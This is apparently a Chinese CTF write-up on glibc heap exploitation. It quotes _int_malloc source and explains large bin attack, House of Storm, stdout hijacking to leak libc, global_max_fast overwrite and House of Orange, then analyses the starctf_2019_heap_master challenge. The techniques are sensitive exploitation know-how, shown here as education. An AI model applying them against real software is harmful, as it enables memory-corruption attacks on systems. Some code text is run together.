/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing access to necessary fields at known offsets from a given base. See explanation below. */
structmalloc_chunk {
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
structmalloc_chunk* fd;/* double links -- used only if free. */ structmalloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */ structmalloc_chunk* fd_nextsize;/* double links -- used only if free. */ structmalloc_chunk* bk_nextsize; };
staticvoid * _int_malloc (mstate av, size_t bytes) { INTERNAL_SIZE_T nb; /* normalized request size */ unsignedint idx; /* associated bin index */ mbinptr bin; /* associated bin */
mchunkptr victim; /* inspected/selected chunk */ INTERNAL_SIZE_T size; /* its size */ int victim_index; /* its bin index */
mchunkptr remainder; /* remainder from a split */ unsignedlong remainder_size; /* its size */
unsignedint block; /* bit map traverser */ unsignedint bit; /* bit map traverser */ unsignedintmap; /* current word of binmap */
mchunkptr fwd; /* misc temp for linking */ mchunkptr bck; /* misc temp for linking */
constchar *errstr = NULL;
/* Convert request size to internal form by adding SIZE_SZ bytes overhead plus possibly more to obtain necessary alignment and/or to obtain a size of at least MINSIZE, the smallest allocatable size. Also, checked_request2size traps (returning 0) request sizes that are so large that they wrap around zero when padded and aligned. */
checked_request2size (bytes, nb);
/* There are no usable arenas. Fall back to sysmalloc to get a chunk from mmap. */ if (__glibc_unlikely (av == NULL)) { void *p = sysmalloc (nb, av); if (p != NULL) alloc_perturb (p, bytes); return p; }
/* If the size qualifies as a fastbin, first check corresponding bin. This code is safe to execute even if av is not yet initialized, so we can try it without checking, which saves some time on this fast path. */
/* If a small request, check regular bin. Since these "smallbins" hold one size each, no searching within bins is necessary. (For a large request, we need to wait until unsorted chunks are processed to find best fit. But for small ones, fits are exact anyway, so we can check now, which is faster.) */ //这里如果符合smallbin执行,也跳过 if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx);
if ((victim = last (bin)) != bin) { if (victim == 0) /* initialization check */ malloc_consolidate (av); else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) { errstr = "malloc(): smallbin double linked list corrupted"; goto errout; } set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin;
/* If this is a large request, consolidate fastbins before continuing. While it might look excessive to kill all fastbins before even seeing if there is space available, this avoids fragmentation problems normally associated with fastbins. Also, in practice, programs tend to have runs of either small or large requests, but less often mixtures, so consolidation is not invoked all that often in most programs. And the programs that it is called frequently in otherwise tend to fragment. */
/* Process recently freed or remaindered chunks, taking one only if it is exact fit, or, if this a small request, the chunk is remainder from the most recent non-exact fit. Place other traversed chunks in bins. Note that this step is the only place in any routine where chunks are placed in bins. The outer loop here is needed because we might not realize until near the end of malloc that we should have consolidated, so must do so and retry. This happens at most once, and only when we would otherwise need to expand memory to service a "small" request. */ //这里是关于largebin_attack的重点 for (;; )//遍历unsortedbin { int iters = 0; while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))//从bk开始遍历 { bck = victim->bk; if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0) || __builtin_expect (victim->size > av->system_mem, 0)) malloc_printerr (check_action, "malloc(): memory corruption", chunk2mem (victim), av); size = chunksize (victim);//获得当前要操作的chunk的size
/* If a small request, try to use last remainder if it is the only chunk in unsorted bin. This helps promote locality for runs of consecutive small requests. This is the only exception to best-fit, and applies only when there is no exact fit for a small chunk. */ //判断smallbin,跳过 if (in_smallbin_range (nb) && bck == unsorted_chunks (av) && victim == av->last_remainder && (unsignedlong) (size) > (unsignedlong) (nb + MINSIZE)) { /* split and reattach remainder */ remainder_size = size - nb; remainder = chunk_at_offset (victim, nb); unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; av->last_remainder = remainder; remainder->bk = remainder->fd = unsorted_chunks (av); if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; }
/* remove from unsorted list */ unsorted_chunks (av)->bk = bck; bck->fd = unsorted_chunks (av); //将victem从unsortedbin中移出来,这里是unsortedbin的核心 /* Take now instead of binning if exact fit */
malloc(0x100),使得malloc遍历unsorted bin,将0x420的chunk放入large bin,发生large bin attack。
Large bin attack的利用
结合IO_FILE hijack
利用large bin attack的任意地址写漏洞特性,错误地将IO 2 1 stdout内部的_IO_write_base修改为0,使得程序调用puts等函数时,能够影响泄露出libc地址,这也就是劫持了stdout。
House of orange
传统的house of orange是利用unsorted bin attack将IO_list全写一个main_arena + 88地址,然后通过chain_next进行转移,而large bin attack更加方便,直接在IO_list全写上一个堆地址,进而伪造IO_FILE结构。
Hijack global_fastmax
通过large bin attack将global_max_fast修改为一个堆地址,导致free任何chunk,都将放入fastbin,从而利用fastbin attack达到任意地址分配。
House of strom
理解了large bin attack,接下来,我们就可以来看house of strom了,house of strom可以实现任意地址分配,看看前面的这道题,我们是将一个合法的unsorted bin chunk链接到unsorted bin里未归位的large bin chunk的bk处,假设,我们将一个任意地址比如addr链接到unsorted bin里未归位的large bin chunk的bk处,然后执行large bin attack会发生什么。
那么,在large bin attack阶段不会有问题,只是接下来,继续遍历,取到我们链接上的这个chunk时,检查其size,不符合要求然后崩溃。我们可以利用前面的large bin attack,先将addr处的size的位置写上一个堆指针,我们可以利用错位法,这样,在size处留下了chunk地址值的第6字节数据,在开启PIE的情况下,一般为0x55为0x56,这样,我们malloc(0x40),遍历到第一个未归位的large bin chunk时,发生large bin attack,接下来遍历到后面这个任意地址的chunk时,发现size符合要求,直接返回给用户,就可以成功把这个任意地址的空间申请过来。
House of strom
House of strom原理
该利用手法适用于glibc 2.28及以下的版本,因为unsorted bin attack在glibc 2.29中已失效。
ctf@70b53f87c516:~/pwn/实验脚本$ checksec starctf_2019_heap_master [*] '/home/ctf/pwn/实验脚本/starctf_2019_heap_master' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Stripped: No
ida静态分析
main()
prog_init()
add()
add()函数,只能malloc(),而不存堆指针
delete()
delete()函数,只能free heap_base范围内的
edit()
edit()函数也是只能改heap_base范围内的
程序功能上看:
程序不能控制add()中malloc()出来的chunk
edit()和delete()只能在heap_base范围内
漏洞点在于可以delete()后继续编辑堆,uaf
重点关注的是:这道题的目的之一是让我们在heap_base的范围上去布局堆内存
思路
程序没有show功能,并且开启了PIE,第一步应该该泄露地址,程序里有调用puts等函数,因而可以hijack IO_2_1_stdout,这里可以用unsorted bin attack或者large bin attack,如果用了unsorted bin attack,后续的利用将无法继续,因为unsorted bin被破坏了,因此,我们选择large bin attack来攻击IO_2_1_stdout。
对于篡改IO_2_1_stdout来泄露数据,flags有要求,必须得经过这两个if,才能到达后方调用syswrite将_IO_write_base与_IO_write_ptr之间的数据信息泄露出来,这就要求flags的低1字节的低4位不能为8,第二字节的低4位必须要为8,也就是说,我们的unsorted bin chunk地址末尾地址应该为0x800这样。
从以上分析来看,large bin attack攻击IO_2_1_stdout是最为合适的,因为需要修改IO_2_1_stdout里的两处内容,即flags和_IO_write_base。